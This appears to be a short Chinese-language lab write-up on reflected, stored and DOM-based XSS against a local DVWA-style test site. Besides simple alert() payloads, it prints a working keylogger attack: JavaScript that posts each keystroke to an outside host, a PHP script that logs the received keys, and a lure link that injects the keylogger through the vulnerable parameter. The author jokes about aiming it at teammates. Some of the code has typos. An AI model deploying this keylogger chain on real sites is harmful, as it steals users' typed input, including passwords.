0x01反射型
<script>alert("zhong")</script>
可以看见什么都没有过滤
0x02存储型XSS
http://www.xss_demo.com/st-xss.php
那么可以看见也是成功了 那我们试试可不可以顺着网线搞一下组员呐??? 算了 没得服务器 搞搞自己吧
document.onkeypress= function(evt){ evt = evt || window.event key = String.fromCharCode(evt.charCode); if(key){ var http = new XMLHttpRequest(); var param =encodeURL(key); http.open("POST","http://192.168.1.102/Keylogger.php",true); http.setRequestHeader("Contenet-type","application/x-www-form-urlencoded"); http.send("key="+param); } }
<?php $key=$_POST['key']; $logfile="keylog.txt"; $fp = fopen($logfile,"a"); fwrite($fp,$key); fclose($fp); ?>
攻击语句
<a href="http://192.168.1.102/dwva/vulnerabilities/xss_r/?name=<scripr+src='http://192.168.1.102/Keylogger.js'></script>">诱人字眼</a>
然后随便敲击 成功写入
0X03dom型
<img src=1 onerror=alert('xss')>
成功